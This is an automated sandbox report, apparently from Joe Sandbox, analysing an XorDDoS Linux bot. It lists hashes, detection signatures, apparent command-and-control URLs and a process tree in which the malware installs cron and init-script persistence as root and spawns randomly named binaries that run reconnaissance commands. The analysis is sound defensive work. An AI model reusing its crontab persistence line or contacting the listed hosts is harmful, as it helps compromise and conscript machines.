Edit tour

Linux Analysis Report
iJl2Sb6qRa

Overview

General Information

Sample Name:	iJl2Sb6qRa
Original Sample Name:	8a1feca84fe6d3d011c183a32c1f48b1edb6c98f2d411f0e83038659a3e274c0
Analysis ID:	841187
MD5:	58881cdfffced4e9013ee3ffe4fdc941
SHA1:	425c413c1ab4e1891d85334bdd05ca279ceea127
SHA256:	8a1feca84fe6d3d011c183a32c1f48b1edb6c98f2d411f0e83038659a3e274c0
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus detection for dropped file

Yara detected XorDDoS Bot

Snort IDS alert for network traffic

Sample tries to persist itself using System V runlevels

Machine Learning detection for dropped file

Sample tries to persist itself using cron

Drops files in suspicious directories

Sample deletes itself

Machine Learning detection for sample

Writes ELF files to disk

Yara signature match

Drops files with innocent-looking names

PID-file does not contain an ASCII number

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Executes the "systemctl" command used for controlling the systemd system and service manager

Detected TCP or UDP traffic on non-standard ports

Sample has stripped symbol table

Reads CPU information from /proc indicative of miner or evasive malware

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	841187
Start date and time:	2023-04-04 19:52:22 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Sample file name:	iJl2Sb6qRa
Original Sample Name:	8a1feca84fe6d3d011c183a32c1f48b1edb6c98f2d411f0e83038659a3e274c0
Detection:	MAL
Classification:	mal100.troj.evad.lin@0/22@2/0

Warnings

VT rate limit hit for: /etc/cron.hourly/gcc.sh
VT rate limit hit for: http://aa.hostasa.org/config.rar
VT rate limit hit for: http://aa.hostasa.org/config.rartat456.com:1522
VT rate limit hit for: http://aa.hostasa.org/config.rartat456.com:1522
VT rate limit hit for: ppp.gggatat456.com:1522

Runtime Messages

Command:	/tmp/iJl2Sb6qRa
PID:	9451
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu1

iJl2Sb6qRa (PID: 9451, Parent: 9383, MD5: 58881cdfffced4e9013ee3ffe4fdc941) Arguments: /tmp/iJl2Sb6qRa

iJl2Sb6qRa New Fork (PID: 9452, Parent: 9451)

iJl2Sb6qRa New Fork (PID: 9454, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9457, Parent: 9454)

iJl2Sb6qRa New Fork (PID: 9462, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9463, Parent: 9462)

update-rc.d (PID: 9463, Parent: 9462, MD5: e9e125904f9ed8ff4c8504a55a149005) Arguments: /usr/bin/perl /usr/sbin/update-rc.d iJl2Sb6qRa defaults

update-rc.d New Fork (PID: 9490, Parent: 9463)

insserv (PID: 9490, Parent: 9463, MD5: 34c11674a0b29347001640aeae7c94f1) Arguments: /usr/lib/insserv/insserv iJl2Sb6qRa

update-rc.d New Fork (PID: 9543, Parent: 9463)

systemctl (PID: 9543, Parent: 9463, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl daemon-reload

iJl2Sb6qRa New Fork (PID: 9474, Parent: 9452)

dash (PID: 9474, Parent: 9452, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

dash New Fork (PID: 9479, Parent: 9474)

sed (PID: 9479, Parent: 9474, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

iJl2Sb6qRa New Fork (PID: 9552, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9553, Parent: 9552)

lsodknzpps (PID: 9553, Parent: 9552, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps ls 9452

lsodknzpps New Fork (PID: 9554, Parent: 9553)

iJl2Sb6qRa New Fork (PID: 9563, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9564, Parent: 9563)

lsodknzpps (PID: 9564, Parent: 9563, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps sh 9452

lsodknzpps New Fork (PID: 9565, Parent: 9564)

iJl2Sb6qRa New Fork (PID: 9574, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9575, Parent: 9574)

lsodknzpps (PID: 9575, Parent: 9574, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps su 9452

lsodknzpps New Fork (PID: 9576, Parent: 9575)

iJl2Sb6qRa New Fork (PID: 9585, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9586, Parent: 9585)

lsodknzpps (PID: 9586, Parent: 9585, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps id 9452

lsodknzpps New Fork (PID: 9587, Parent: 9586)

iJl2Sb6qRa New Fork (PID: 9596, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9597, Parent: 9596)

lsodknzpps (PID: 9597, Parent: 9596, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps id 9452

lsodknzpps New Fork (PID: 9598, Parent: 9597)

iJl2Sb6qRa New Fork (PID: 9607, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9608, Parent: 9607)

cjfywultqo (PID: 9608, Parent: 9607, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo top 9452

cjfywultqo New Fork (PID: 9609, Parent: 9608)

iJl2Sb6qRa New Fork (PID: 9618, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9619, Parent: 9618)

cjfywultqo (PID: 9619, Parent: 9618, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo "ps -ef" 9452

cjfywultqo New Fork (PID: 9620, Parent: 9619)

iJl2Sb6qRa New Fork (PID: 9629, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9630, Parent: 9629)

cjfywultqo (PID: 9630, Parent: 9629, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo "cat resolv.conf" 9452

cjfywultqo New Fork (PID: 9631, Parent: 9630)

iJl2Sb6qRa New Fork (PID: 9640, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9641, Parent: 9640)

cjfywultqo (PID: 9641, Parent: 9640, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo id 9452

cjfywultqo New Fork (PID: 9642, Parent: 9641)

iJl2Sb6qRa New Fork (PID: 9651, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9652, Parent: 9651)

cjfywultqo (PID: 9652, Parent: 9651, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo whoami 9452

cjfywultqo New Fork (PID: 9653, Parent: 9652)

iJl2Sb6qRa New Fork (PID: 9662, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9663, Parent: 9662)

ckxgqrmzxa (PID: 9663, Parent: 9662, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa uptime 9452

ckxgqrmzxa New Fork (PID: 9665, Parent: 9663)

iJl2Sb6qRa New Fork (PID: 9673, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9674, Parent: 9673)

ckxgqrmzxa (PID: 9674, Parent: 9673, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa uptime 9452

ckxgqrmzxa New Fork (PID: 9675, Parent: 9674)

iJl2Sb6qRa New Fork (PID: 9684, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9685, Parent: 9684)

ckxgqrmzxa (PID: 9685, Parent: 9684, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa "sleep 1" 9452

ckxgqrmzxa New Fork (PID: 9686, Parent: 9685)

iJl2Sb6qRa New Fork (PID: 9695, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9696, Parent: 9695)

ckxgqrmzxa (PID: 9696, Parent: 9695, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa uptime 9452

ckxgqrmzxa New Fork (PID: 9698, Parent: 9696)

iJl2Sb6qRa New Fork (PID: 9706, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9707, Parent: 9706)

ckxgqrmzxa (PID: 9707, Parent: 9706, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa "cd /etc" 9452

ckxgqrmzxa New Fork (PID: 9709, Parent: 9707)

iJl2Sb6qRa New Fork (PID: 9717, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9718, Parent: 9717)

dezqblvxuy (PID: 9718, Parent: 9717, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy "cd /etc" 9452

dezqblvxuy New Fork (PID: 9719, Parent: 9718)

iJl2Sb6qRa New Fork (PID: 9728, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9729, Parent: 9728)

dezqblvxuy (PID: 9729, Parent: 9728, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy "netstat -antop" 9452

dezqblvxuy New Fork (PID: 9730, Parent: 9729)

iJl2Sb6qRa New Fork (PID: 9739, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9740, Parent: 9739)

dezqblvxuy (PID: 9740, Parent: 9739, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy "netstat -an" 9452

dezqblvxuy New Fork (PID: 9741, Parent: 9740)

iJl2Sb6qRa New Fork (PID: 9750, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9751, Parent: 9750)

dezqblvxuy (PID: 9751, Parent: 9750, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy "ps -ef" 9452

dezqblvxuy New Fork (PID: 9752, Parent: 9751)

iJl2Sb6qRa New Fork (PID: 9761, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9762, Parent: 9761)

dezqblvxuy (PID: 9762, Parent: 9761, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy pwd 9452

dezqblvxuy New Fork (PID: 9763, Parent: 9762)

iJl2Sb6qRa New Fork (PID: 9772, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9773, Parent: 9772)

hgfzmygnbx (PID: 9773, Parent: 9772, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx "cat resolv.conf" 9452

hgfzmygnbx New Fork (PID: 9774, Parent: 9773)

iJl2Sb6qRa New Fork (PID: 9783, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9784, Parent: 9783)

hgfzmygnbx (PID: 9784, Parent: 9783, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx top 9452

hgfzmygnbx New Fork (PID: 9785, Parent: 9784)

iJl2Sb6qRa New Fork (PID: 9794, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9795, Parent: 9794)

hgfzmygnbx (PID: 9795, Parent: 9794, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx sh 9452

hgfzmygnbx New Fork (PID: 9796, Parent: 9795)

iJl2Sb6qRa New Fork (PID: 9805, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9806, Parent: 9805)

hgfzmygnbx (PID: 9806, Parent: 9805, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx uptime 9452

hgfzmygnbx New Fork (PID: 9807, Parent: 9806)

iJl2Sb6qRa New Fork (PID: 9816, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9817, Parent: 9816)

hgfzmygnbx (PID: 9817, Parent: 9816, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx "cat resolv.conf" 9452

hgfzmygnbx New Fork (PID: 9818, Parent: 9817)

iJl2Sb6qRa New Fork (PID: 9827, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9828, Parent: 9827)

lnmgbribvb (PID: 9828, Parent: 9827, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb pwd 9452

lnmgbribvb New Fork (PID: 9829, Parent: 9828)

iJl2Sb6qRa New Fork (PID: 9838, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9839, Parent: 9838)

lnmgbribvb (PID: 9839, Parent: 9838, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb bash 9452

lnmgbribvb New Fork (PID: 9840, Parent: 9839)

iJl2Sb6qRa New Fork (PID: 9849, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9850, Parent: 9849)

lnmgbribvb (PID: 9850, Parent: 9849, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb top 9452

lnmgbribvb New Fork (PID: 9851, Parent: 9850)

iJl2Sb6qRa New Fork (PID: 9860, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9861, Parent: 9860)

lnmgbribvb (PID: 9861, Parent: 9860, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb id 9452

lnmgbribvb New Fork (PID: 9862, Parent: 9861)

iJl2Sb6qRa New Fork (PID: 9871, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9872, Parent: 9871)

lnmgbribvb (PID: 9872, Parent: 9871, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb su 9452

lnmgbribvb New Fork (PID: 9873, Parent: 9872)

iJl2Sb6qRa New Fork (PID: 9882, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9883, Parent: 9882)

wdcujvrbpo (PID: 9883, Parent: 9882, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo uptime 9452

wdcujvrbpo New Fork (PID: 9885, Parent: 9883)

iJl2Sb6qRa New Fork (PID: 9893, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9894, Parent: 9893)

wdcujvrbpo (PID: 9894, Parent: 9893, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo "ps -ef" 9452

wdcujvrbpo New Fork (PID: 9895, Parent: 9894)

iJl2Sb6qRa New Fork (PID: 9904, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9905, Parent: 9904)

wdcujvrbpo (PID: 9905, Parent: 9904, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo "cd /etc" 9452

wdcujvrbpo New Fork (PID: 9907, Parent: 9905)

iJl2Sb6qRa New Fork (PID: 9915, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9916, Parent: 9915)

wdcujvrbpo (PID: 9916, Parent: 9915, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo uptime 9452

wdcujvrbpo New Fork (PID: 9917, Parent: 9916)

iJl2Sb6qRa New Fork (PID: 9926, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9927, Parent: 9926)

wdcujvrbpo (PID: 9927, Parent: 9926, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo top 9452

wdcujvrbpo New Fork (PID: 9928, Parent: 9927)

iJl2Sb6qRa New Fork (PID: 9937, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9938, Parent: 9937)

zbksjhrfms (PID: 9938, Parent: 9937, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms "netstat -antop" 9452

zbksjhrfms New Fork (PID: 9939, Parent: 9938)

iJl2Sb6qRa New Fork (PID: 9948, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9949, Parent: 9948)

zbksjhrfms (PID: 9949, Parent: 9948, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms "echo \"find\"" 9452

zbksjhrfms New Fork (PID: 9950, Parent: 9949)

iJl2Sb6qRa New Fork (PID: 9959, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9960, Parent: 9959)

zbksjhrfms (PID: 9960, Parent: 9959, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms top 9452

zbksjhrfms New Fork (PID: 9961, Parent: 9960)

iJl2Sb6qRa New Fork (PID: 9970, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9971, Parent: 9970)

zbksjhrfms (PID: 9971, Parent: 9970, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms bash 9452

zbksjhrfms New Fork (PID: 9972, Parent: 9971)

iJl2Sb6qRa New Fork (PID: 9981, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9982, Parent: 9981)

zbksjhrfms (PID: 9982, Parent: 9981, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms "cat resolv.conf" 9452

zbksjhrfms New Fork (PID: 9983, Parent: 9982)

iJl2Sb6qRa New Fork (PID: 9994, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 9995, Parent: 9994)

eoqlmyvucn (PID: 9995, Parent: 9994, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn "netstat -antop" 9452

eoqlmyvucn New Fork (PID: 9996, Parent: 9995)

iJl2Sb6qRa New Fork (PID: 10005, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10006, Parent: 10005)

eoqlmyvucn (PID: 10006, Parent: 10005, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn "netstat -an" 9452

eoqlmyvucn New Fork (PID: 10007, Parent: 10006)

iJl2Sb6qRa New Fork (PID: 10016, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10017, Parent: 10016)

eoqlmyvucn (PID: 10017, Parent: 10016, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn top 9452

eoqlmyvucn New Fork (PID: 10019, Parent: 10017)

iJl2Sb6qRa New Fork (PID: 10027, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10028, Parent: 10027)

eoqlmyvucn (PID: 10028, Parent: 10027, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn "cd /etc" 9452

eoqlmyvucn New Fork (PID: 10029, Parent: 10028)

iJl2Sb6qRa New Fork (PID: 10038, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10039, Parent: 10038)

eoqlmyvucn (PID: 10039, Parent: 10038, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn "ls -la" 9452

eoqlmyvucn New Fork (PID: 10040, Parent: 10039)

iJl2Sb6qRa New Fork (PID: 10049, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10050, Parent: 10049)

wzhmvohlxs (PID: 10050, Parent: 10049, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs uptime 9452

wzhmvohlxs New Fork (PID: 10051, Parent: 10050)

iJl2Sb6qRa New Fork (PID: 10060, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10061, Parent: 10060)

wzhmvohlxs (PID: 10061, Parent: 10060, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs "netstat -antop" 9452

wzhmvohlxs New Fork (PID: 10062, Parent: 10061)

iJl2Sb6qRa New Fork (PID: 10071, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10072, Parent: 10071)

wzhmvohlxs (PID: 10072, Parent: 10071, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs ifconfig 9452

wzhmvohlxs New Fork (PID: 10073, Parent: 10072)

iJl2Sb6qRa New Fork (PID: 10082, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10083, Parent: 10082)

wzhmvohlxs (PID: 10083, Parent: 10082, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs ifconfig 9452

wzhmvohlxs New Fork (PID: 10084, Parent: 10083)

iJl2Sb6qRa New Fork (PID: 10093, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10094, Parent: 10093)

wzhmvohlxs (PID: 10094, Parent: 10093, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs "ifconfig eth0" 9452

wzhmvohlxs New Fork (PID: 10095, Parent: 10094)

iJl2Sb6qRa New Fork (PID: 10104, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10105, Parent: 10104)

hiueshutol (PID: 10105, Parent: 10104, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol "sleep 1" 9452

hiueshutol New Fork (PID: 10106, Parent: 10105)

iJl2Sb6qRa New Fork (PID: 10115, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10116, Parent: 10115)

hiueshutol (PID: 10116, Parent: 10115, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol "cat resolv.conf" 9452

hiueshutol New Fork (PID: 10117, Parent: 10116)

iJl2Sb6qRa New Fork (PID: 10126, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10127, Parent: 10126)

hiueshutol (PID: 10127, Parent: 10126, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol uptime 9452

hiueshutol New Fork (PID: 10128, Parent: 10127)

iJl2Sb6qRa New Fork (PID: 10137, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10138, Parent: 10137)

hiueshutol (PID: 10138, Parent: 10137, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol "route -n" 9452

hiueshutol New Fork (PID: 10139, Parent: 10138)

iJl2Sb6qRa New Fork (PID: 10148, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10149, Parent: 10148)

hiueshutol (PID: 10149, Parent: 10148, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol ifconfig 9452

hiueshutol New Fork (PID: 10151, Parent: 10149)

iJl2Sb6qRa New Fork (PID: 10159, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10160, Parent: 10159)

mhvrcmaysv (PID: 10160, Parent: 10159, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv "cat resolv.conf" 9452

mhvrcmaysv New Fork (PID: 10161, Parent: 10160)

iJl2Sb6qRa New Fork (PID: 10170, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10171, Parent: 10170)

mhvrcmaysv (PID: 10171, Parent: 10170, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv "ls -la" 9452

mhvrcmaysv New Fork (PID: 10172, Parent: 10171)

iJl2Sb6qRa New Fork (PID: 10181, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10182, Parent: 10181)

mhvrcmaysv (PID: 10182, Parent: 10181, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv top 9452

mhvrcmaysv New Fork (PID: 10183, Parent: 10182)

iJl2Sb6qRa New Fork (PID: 10192, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10193, Parent: 10192)

mhvrcmaysv (PID: 10193, Parent: 10192, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv "netstat -antop" 9452

mhvrcmaysv New Fork (PID: 10194, Parent: 10193)

iJl2Sb6qRa New Fork (PID: 10203, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10204, Parent: 10203)

mhvrcmaysv (PID: 10204, Parent: 10203, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv "ifconfig eth0" 9452

mhvrcmaysv New Fork (PID: 10205, Parent: 10204)

iJl2Sb6qRa New Fork (PID: 10214, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10215, Parent: 10214)

chdmwyeiia (PID: 10215, Parent: 10214, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia "ifconfig eth0" 9452

chdmwyeiia New Fork (PID: 10216, Parent: 10215)

iJl2Sb6qRa New Fork (PID: 10225, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10226, Parent: 10225)

chdmwyeiia (PID: 10226, Parent: 10225, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia "ls -la" 9452

chdmwyeiia New Fork (PID: 10227, Parent: 10226)

iJl2Sb6qRa New Fork (PID: 10236, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10237, Parent: 10236)

chdmwyeiia (PID: 10237, Parent: 10236, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia who 9452

chdmwyeiia New Fork (PID: 10238, Parent: 10237)

iJl2Sb6qRa New Fork (PID: 10247, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10248, Parent: 10247)

chdmwyeiia (PID: 10248, Parent: 10247, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia id 9452

chdmwyeiia New Fork (PID: 10249, Parent: 10248)

iJl2Sb6qRa New Fork (PID: 10258, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10259, Parent: 10258)

chdmwyeiia (PID: 10259, Parent: 10258, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia "cd /etc" 9452

chdmwyeiia New Fork (PID: 10260, Parent: 10259)

iJl2Sb6qRa New Fork (PID: 10269, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10270, Parent: 10269)

emnaztxelb (PID: 10270, Parent: 10269, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "netstat -an" 9452

emnaztxelb New Fork (PID: 10271, Parent: 10270)

iJl2Sb6qRa New Fork (PID: 10280, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10281, Parent: 10280)

emnaztxelb (PID: 10281, Parent: 10280, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "echo \"find\"" 9452

emnaztxelb New Fork (PID: 10282, Parent: 10281)

iJl2Sb6qRa New Fork (PID: 10291, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10292, Parent: 10291)

emnaztxelb (PID: 10292, Parent: 10291, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "sleep 1" 9452

emnaztxelb New Fork (PID: 10293, Parent: 10292)

iJl2Sb6qRa New Fork (PID: 10302, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10303, Parent: 10302)

emnaztxelb (PID: 10303, Parent: 10302, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "ifconfig eth0" 9452

emnaztxelb New Fork (PID: 10304, Parent: 10303)

iJl2Sb6qRa New Fork (PID: 10313, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10314, Parent: 10313)

emnaztxelb (PID: 10314, Parent: 10313, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "route -n" 9452

emnaztxelb New Fork (PID: 10315, Parent: 10314)

iJl2Sb6qRa New Fork (PID: 10324, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10325, Parent: 10324)

yimgbvpxre (PID: 10325, Parent: 10324, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre sh 9452

yimgbvpxre New Fork (PID: 10326, Parent: 10325)

iJl2Sb6qRa New Fork (PID: 10335, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10336, Parent: 10335)

yimgbvpxre (PID: 10336, Parent: 10335, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre bash 9452

yimgbvpxre New Fork (PID: 10337, Parent: 10336)

iJl2Sb6qRa New Fork (PID: 10346, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10347, Parent: 10346)

yimgbvpxre (PID: 10347, Parent: 10346, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre "grep \"A\"" 9452

yimgbvpxre New Fork (PID: 10348, Parent: 10347)

iJl2Sb6qRa New Fork (PID: 10357, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10358, Parent: 10357)

yimgbvpxre (PID: 10358, Parent: 10357, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre "ifconfig eth0" 9452

yimgbvpxre New Fork (PID: 10359, Parent: 10358)

iJl2Sb6qRa New Fork (PID: 10368, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10369, Parent: 10368)

